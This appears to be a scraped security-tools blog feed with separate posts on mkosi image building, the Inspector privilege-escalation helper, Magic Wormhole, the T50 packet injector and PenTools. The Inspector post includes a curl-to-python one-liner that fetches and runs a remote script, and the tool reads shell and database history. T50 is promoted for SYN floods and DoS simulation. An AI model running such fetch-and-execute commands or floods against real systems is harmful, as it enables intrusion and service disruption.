mkosi is supposed to be legacy-free: the focus is clearly on today’s technology, not yesteryear’s. Specifically this means that we’ll generate GPT partition tables, not MBR/DOS ones. When you tell mkosi to generate a bootable image for you, it will make it bootable on EFI, not on legacy BIOS. The GPT images generated follow specifications such as the Discoverable Partitions Specification, so that /etc/fstabcan remain unpopulated and tools such as systemd-nspawn can automatically dissect the image and boot from them.

 

Supported output formats

The following output formats are supported:

  • Raw GPT disk image, with ext4 as root (raw_gpt)
  • Raw GPT disk image, with btrfs as root (raw_btrfs)
  • Raw GPT disk image, with squashfs as read-only root (raw_squashfs)
  • Plain directory, containing the OS tree (directory)
  • btrfs subvolume, with separate subvolumes for /var/home/srv/var/tmp (subvolume)
  • Tarball (tar)

When a GPT disk image is created, the following additional options are available:

  • A swap partition may be added in
  • The image may be made bootable on EFI systems
  • Separate partitions for /srv and /home may be added in
  • The root, /srv and /home partitions may optionally be encrypted with LUKS.
  • A dm-verity partition may be added in that adds runtime integrity data for the root partition

 

Compatibility

Generated images are legacy-free. This means only GPT disk labels (and no MBR disk labels) are supported, and only systemd based images may be generated. Moreover, for bootable images only EFI systems are supported (not plain MBR/BIOS).

All generated GPT disk images may be booted in a local container directly with:

systemd-nspawn -bi image.raw

Additionally, bootable GPT disk images (as created with the --bootable flag) work when booted directly by EFI systems, for example in KVM via:

qemu-kvm -m 512 -smp 2 -bios /usr/share/edk2/ovmf/OVMF_CODE.fd -drive format=raw,file=image.raw

EFI bootable GPT images are larger than plain GPT images, as they additionally carry an EFI system partition containing a boot loader, as well as a kernel, kernel modules, udev and more.

All directory or btrfs subvolume images may be booted directly with:

systemd-nspawn -bD image

▼Advertisements

Other features

  • Optionally, create an SHA256SUMS checksum file for the result, possibly even signed via gpg.
  • Optionally, place a specific .nspawn settings file along with the result.
  • Optionally, build a local project’s source tree in the image and add the result to the generated image (see below).
  • Optionally, share RPM/DEB package cache between multiple runs, in order to optimize build speeds.
  • Optionally, the resulting image may be compressed with XZ.
  • Optionally, btrfs’ read-only flag for the root subvolume may be set.
  • Optionally, btrfs’ compression may be enabled for all created subvolumes.
  • By default images are created without all files marked as documentation in the packages, on distributions where the package manager supports this. Use the --with-docs flag to build an image with docs added.

 

Supported distributions

Images may be created containing installations of the following OSes.

  • Fedora
  • Debian
  • Ubuntu
  • Arch Linux (incomplete)
  • openSUSE

In theory, any distribution may be used on the host for building images containing any other distribution, as long as the necessary tools are available. Specifically, any distro that packages debootstrap may be used to build Debian or Ubuntu images. Any distro that packages dnf may be used to build Fedora images. Any distro that packages pacstrap may be used to build Arch Linux images. Any distro that packages zypper may be used to build openSUSE images.

Currently, Fedora packages all four tools as of Fedora 26.

 

Files

To make it easy to build images for development versions of your projects, mkosi can read configuration data from the local directory, under the assumption that it is invoked from a source tree. Specifically, the following files are used if they exist in the local directory:

  • mkosi.default may be used to configure mkosi’s image building process. For example, you may configure the distribution to use (fedoraubuntudebianarchlinux) for the image, or additional distribution packages to install. Note that all options encoded in this configuration file may also be set on the command line, and this file is hence little more than a way to make sure simply typing mkosi without further parameters in your source tree is enough to get the right image of your choice set up. Additionally if a mkosi.default.d directory exists, each file in it is loaded in the same manner adding/overriding the values specified in mkosi.default.
  • mkosi.extra may be a directory. If this exists all files contained in it are copied over the directory tree of the image after the OS was installed. This may be used to add in additional files to an image, on top of what the distribution includes in its packages.
  • mkosi.build may be an executable script. If it exists the image will be built twice: the first iteration will be thedevelopment image, the second iteration will be the final image. The development image is used to build the project in the current working directory (the source tree). For that the whole directory is copied into the image, along with the mkosi.build build script. The script is then invoked inside the image (via systemd-nspawn), with $SRCDIR pointing to the source tree. $DESTDIR points to a directory where the script should place any files generated it would like to end up in the final image. Note that make/automake based build systems generally honour $DESTDIR, thus making it very natural to build source trees from the build script. After the development image was built and the build script ran inside of it, it is removed again. After that the final image is built, without any source tree or build script copied in. However, this time the contents of $DESTDIR is added into the image.
  • mkosi.postinst may be an executable script. If it exists it is invoked as last step of preparing an image, from within the image context. It is once called for the development image (if this is enabled, see above) with the “build” command line parameter, right before invoking the build script. It is called a second time for the final image with the “final” command line parameter, right before the image is considered complete. This script may be used to alter the images without any restrictions, after all software packages and built sources have been installed. Note that this script is executed directly in the image context with the final root directory in place, without any $SRCDIR/$DESTDIR setup.
  • mkosi.nspawn may be an nspawn settings file. If this exists it will be copied into the same place as the output image file. This is useful since nspawn looks for settings files next to image files it boots, for additional container runtime settings.
  • mkosi.cache may be a directory. If so, it is automatically used as package download cache, in order to speed repeated runs of the tool.
  • mkosi.passphrase may be a passphrase file to use when LUKS encryption is selected. It should contain the passphrase literally, and not end in a newline character (i.e. in the same format as cryptsetup and /etc/crypttab expect the passphrase files). The file must have an access mode of 0600 or less. If this file does not exist and encryption is requested the user is queried instead.
  • mkosi.secure-boot.crt and mkosi.secure-boot.key may contain an X509 certificate and PEM private key to use when UEFI SecureBoot support is enabled. All EFI binaries included in the image’s ESP are signed with this key, as a late step in the build process.

All these files are optional.

Note that the location of all these files may also be configured during invocation via command line switches, and as settings in mkosi.default, in case the default settings are not acceptable for a project.

 

Requirements

mkosi is packaged for various distributions: Debian, Ubuntu, Arch (in AUR), Fedora. It is usually easiest to use the distribution package.

The current version requires systemd 233 (or actually, systemd-nspawn of it).

When not using distribution packages make sure to install the necessary dependencies. For example, on Fedora you need:

dnf install arch-install-scripts btrfs-progs debootstrap dosfstools edk2-ovmf squashfs-tools gnupg python3 tar veritysetup xz

Note that the minimum required Python version is 3.5.

If SecureBoot signing is to be used, then the “sbsign” tool needs to be installed as well, which is currently not available on Fedora, but in a COPR repository:

dnf copr enable msekleta/sbsigntool
dnf install sbsigntool

https://github.com/systemd/mkosi

 

The post Build Legacy-Free OS Images: mkosi appeared first on DigitalMunition.

Inspector – Privilege Escalation Unix HelperInspector – Privilege Escalation Unix HelperInspector – Privilege Escalation Unix Helper

$
0
0
b
Inspector is a python script for help in privilege escalation, for linux environement. After starting, this script search the kernel version and check if is exploit exists, load file history bash,zsh,mysql… and load list of programs loaded with root user.

Download on server

wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py

Execute Inspector

python inspector.py

Or download & execute

curl https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py | python

 

The post Inspector – Privilege Escalation Unix HelperInspector – Privilege Escalation Unix HelperInspector – Privilege Escalation Unix Helper appeared first on DigitalMunition.

Magic Wormhole – Get Things From One Computer To Another, Safely

$
0
0
w
This package provides a library and a command-line tool named wormhole, which makes it possible to get arbitrary-sized files and directories (or short pieces of text) from one computer to another. The two endpoints are identified by using identical “wormhole codes”: in general, the sending machine generates and displays the code, which must then be typed into the receiving machine.
The codes are short and human-pronounceable, using a phonetically-distinct wordlist. The receiving side offers tab-completion on the codewords, so usually only a few characters must be typed. Wormhole codes are single-use and do not need to be memorized.

Example
Sender:

% wormhole send README.md
Sending 7924 byte file named 'README.md'
On the other computer, please run: wormhole receive
Wormhole code is: 7-crossover-clockwork

Sending (<-10.0.1.43:58988)..
100%|=========================| 7.92K/7.92K [00:00<00:00, 6.02MB/s]
File sent.. waiting for confirmation
Confirmation received. Transfer complete.

Receiver:

% wormhole receive
Enter receive wormhole code: 7-crossover-clockwork
Receiving file (7924 bytes) into: README.md
ok? (y/n): y
Receiving (->tcp:10.0.1.43:58986)..
100%|===========================| 7.92K/7.92K [00:00<00:00, 120KB/s]
Received file written to README.md

Installation
$ pip install magic-wormhole

OS X
On OS X, you may need to install pip and run $ xcode-select --install to get GCC.
Or with homebrew:
$ brew install magic-wormhole

Linux
On Debian 9 and Ubuntu 17.04+ with apt:
$ sudo apt install magic-wormhole
On previous versions of the Debian/Ubuntu systems, or if you want to install the latest version, you may first need:
$ apt-get install python-pip build-essential python-dev libffi-dev libssl-dev
On Fedora:
$ dnf install python-pip python-devel libffi-devel openssl-devel gcc-c++ libtool redhat-rpm-config.
Note: If you get errors like fatal error: sodium.h: No such file or directory on Linux, either useSODIUM_INSTALL=bundled pip install magic-wormhole, or try installing the libsodium-dev / libsodium-develpackage. These work around a bug in pynacl which gets confused when the libsodium runtime is installed (e.g. libsodium13) but not the development package.

Windows
On Windows, python2 may work better than python3. On older systems, $ pip install --upgrade pip may be necessary to get a version that can compile all the dependencies.

Motivation

  • Moving a file to a friend’s machine, when the humans can speak to each other (directly) but the computers cannot
  • Delivering a properly-random password to a new user via the phone
  • Supplying an SSH public key for future login use

Copying files onto a USB stick requires physical proximity, and is uncomfortable for transferring long-term secrets because flash memory is hard to erase. Copying files with ssh/scp is fine, but requires previous arrangements and an account on the target machine, and how do you bootstrap the account? Copying files through email first requires transcribing an email address in the opposite direction, and is even worse for secrets, because email is unencrypted. Copying files through encrypted email requires bootstrapping a GPG key as well as an email address. Copying files through Dropbox is not secure against the Dropbox server and results in a large URL that must be transcribed. Using a URL shortener adds an extra step, reveals the full URL to the shortening service, and leaves a short URL that can be guessed by outsiders.
Many common use cases start with a human-mediated communication channel, such as IRC, IM, email, a phone call, or a face-to-face conversation. Some of these are basically secret, or are “secret enough” to last until the code is delivered and used. If this does not feel strong enough, users can turn on additional verification that doesn’t depend upon the secrecy of the channel.
The notion of a “magic wormhole” comes from the image of two distant wizards speaking the same enchanted phrase at the same time, and causing a mystical connection to pop into existence between them. The wizards then throw books into the wormhole and they fall out the other side. Transferring files securely should be that easy.

▼Advertisements

Design
The wormhole tool uses PAKE “Password-Authenticated Key Exchange”, a family of cryptographic algorithms that uses a short low-entropy password to establish a strong high-entropy shared key. This key can then be used to encrypt data. wormhole uses the SPAKE2 algorithm, due to Abdalla and Pointcheval1.
PAKE effectively trades off interaction against offline attacks. The only way for a network attacker to learn the shared key is to perform a man-in-the-middle attack during the initial connection attempt, and to correctly guess the code being used by both sides. Their chance of doing this is inversely proportional to the entropy of the wormhole code. The default is to use a 16-bit code (use –code-length= to change this), so for each use of the tool, an attacker gets a 1-in-65536 chance of success. As such, users can expect to see many error messages before the attacker has a reasonable chance of success.

Timing
The program does not have any built-in timeouts, however it is expected that both clients will be run within an hour or so of each other. This makes the tool most useful for people who are having a real-time conversation already, and want to graduate to a secure connection. Both clients must be left running until the transfer has finished.

Relays
The wormhole library requires a “Rendezvous Server”: a simple WebSocket-based relay that delivers messages from one client to another. This allows the wormhole codes to omit IP addresses and port numbers. The URL of a public server is baked into the library for use as a default, and will be freely available until volume or abuse makes it infeasible to support. Applications which desire more reliability can easily run their own relay and configure their clients to use it instead. Code for the Rendezvous Server is included in the library.
The file-transfer commands also use a “Transit Relay”, which is another simple server that glues together two inbound TCP connections and transfers data on each to the other. The wormhole send file mode shares the IP addresses of each client with the other (inside the encrypted message), and both clients first attempt to connect directly. If this fails, they fall back to using the transit relay. As before, the host/port of a public server is baked into the library, and should be sufficient to handle moderate traffic.
The protocol includes provisions to deliver notices and error messages to clients: if either relay must be shut down, these channels will be used to provide information about alternatives.

CLI tool

  • wormhole send [args] --text TEXT
  • wormhole send [args] FILENAME
  • wormhole send [args] DIRNAME
  • wormhole receive [args]

Both commands accept additional arguments to influence their behavior:

  • --code-length WORDS: use more or fewer than 2 words for the code
  • --verify : print (and ask user to compare) extra verification string

Library
The wormhole module makes it possible for other applications to use these code-protected channels. This includes Twisted support, and (in the future) will include blocking/synchronous support too. See docs/api.md for details.
The file-transfer tools use a second module named wormhole.transit, which provides an encrypted record-pipe. It knows how to use the Transit Relay as well as direct connections, and attempts them all in parallel. TransitSender andTransitReceiver are distinct, although once the connection is established, data can flow in either direction. All data is encrypted (using nacl/libsodium “secretbox”) using a key derived from the PAKE phase. See src/wormhole/cli/cmd_send.pyfor examples.

Development
To set up Magic Wormhole for development, you will first need to install virtualenv.
Once you’ve done that, cd into the root of the repository and run:

virtualenv venv
source venv/bin/activate
pip install --upgrade pip setuptools

Now your virtualenv has been activated. You’ll want to re-run source venv/bin/activate for every new terminal session you open.
To install Magic Wormhole and its development dependencies into your virtualenv, run:

pip install -e .[dev]

Running Tests
Within your virtualenv, the command-line program trial will run the test suite:

trial wormhole

This tests the entire wormhole package. If you want to run only the tests for a specific module, or even just a specific test, you can specify it instead via Python’s standard dotted import notation, e.g.:

trial wormhole.test.test_cli.PregeneratedCode.test_file_tor

Developers can also just clone the source tree and run tox to run the unit tests on all supported (and installed) versions of python: 2.7, 3.4, 3.5, and 3.6.

Troubleshooting
Every so often, you might get a traceback with the following kind of error:

pkg_resources.DistributionNotFound: The 'magic-wormhole==0.9.1-268.g66e0d86.dirty' distribution was not found and is required by the application

If this happens, run pip install -e .[dev] again.

The post Magic Wormhole – Get Things From One Computer To Another, Safely appeared first on DigitalMunition.

T50 – The Fastest Mixed Packet Injector Tool

$
0
0
z

T50 (f.k.a. F22 Raptor) is a high performance mixed packet injector tool designed to perform Stress Testing.

The concept started on 2001, right after release ‘nb-isakmp.c‘, and the main goal was to have a tool to perform TCP/IP protocol fuzzing, covering common regular protocols, such as: ICMP, TCP and UDP.

Why Stress Testing?

Why Stress Testing? Well, because when people are designing a new network infra-structure (e.g. Data center serving to Cloud Computing) they think about:

  1. High-Availability
  2. Load Balancing
  3. Backup Sites (Cold Sites, Hot Sites, and Warm Sites)
  4. Disaster Recovery
  5. Data Redundancy
  6. Service Level Agreements

 

But almost nobody thinks about Stress Testing, or even performs any test to check how the networks infra-structure behaves under stress, under overload, and under attack. Even during a Penetration Test, people prefer not running any kind of Denial-of-Service testing. Even worse, those people are missing one of the three key concepts of security that are common to risk management:

  • Confidentiality
  • Integrity
  • AVAILABILITY

T50 was designed to perform Stress Testing on a variety of infra-structure network devices (Version 2.45), using widely implemented protocols, and after some requests it was was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP, TCP and UDP), some infra-structure specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP, EIGRP and OSPF).

Features

T50 is a powerful and unique packet injector tool, which is capable of sending sequentially the following fourteen protocols:

  1. ICMP – Internet Control Message Protocol
  2. IGMPv1 – Internet Group Management Protocol v1
  3. IGMPv3 – Internet Group Management Protocol v3
  4. TCP – Transmission Control Protocol
  5. EGP – Exterior Gateway Protocol
  6. UDP – User Datagram Protocol
  7. RIPv1 – Routing Information Protocol v1
  8. RIPv2 – Routing Information Protocol v2
  9. DCCP – Datagram Congestion Control Protocol
  10. RSVP – Resource ReSerVation Protocol
  11. GRE – Generic Routing Encapsulation
  12. IPSec – Internet Protocol Security (AH/ESP)
  13. EIGRP – Enhanced Interior Gateway Routing Protocol
  14. OSPF – Open Shortest Path First

▼Advertisements

It is the only tool capable to encapsulate the protocols (listed above) within Generic Routing Encapsulation (GRE).

It can also send an (quite) incredible amount of packets per second, making it a second to none tool:

  • More than 1,000,000 pps of SYN Flood (+50% of the network uplink) in a 1000BASE-T Network (Gigabit Ethernet).
  • More than 120,000 pps of SYN Flood (+60% of the network uplink) in a 100BASE-TX Network (Fast Ethernet).

Perform Stress Testing on a variety of network infrastructure, network devices and security solutions in place.

And also Simulate “Distributed Denial-of-Service” & “Denial-of-Service” attacks, validating Firewall rules, Router ACLs, Intrusion Detection System and Intrusion Prevention System policies.

The main differentiation of the T50 is that it is able to send all protocols, sequentially, using one single SOCKET, besides it is capable to be used to modify network routes, letting IT Security Professionals perform advanced Penetration Tests.

You can download T50 here:

t50-v5.6.15.zip

Or read more here.

The post T50 – The Fastest Mixed Packet Injector Tool appeared first on DigitalMunition.

PenTools – Penetration Testing Tools Bundle

$
0
0
p

PenTools is a bundle of Python and Bash penetration testing tools for the recon and information gathering stage of a PT or VA.

They are fairly simple scripts but might be interesting if you are new and want to see how some things are done, or how things can be automated using Python or Bash.

▼Advertisements

Features

Tools included:

  • Mass DNS lookup
  • Mass reverse DNS lookup
  • DNS Enumerator
  • SMTP Username verification
  • Ping sweeper
  • DNS zone transfer information gatherer

You can download PenTools here:

PenTools-master.zip

Or read more here.

The post PenTools – Penetration Testing Tools Bundle appeared first on DigitalMunition.

Viewing all 236 articles
Browse latest View live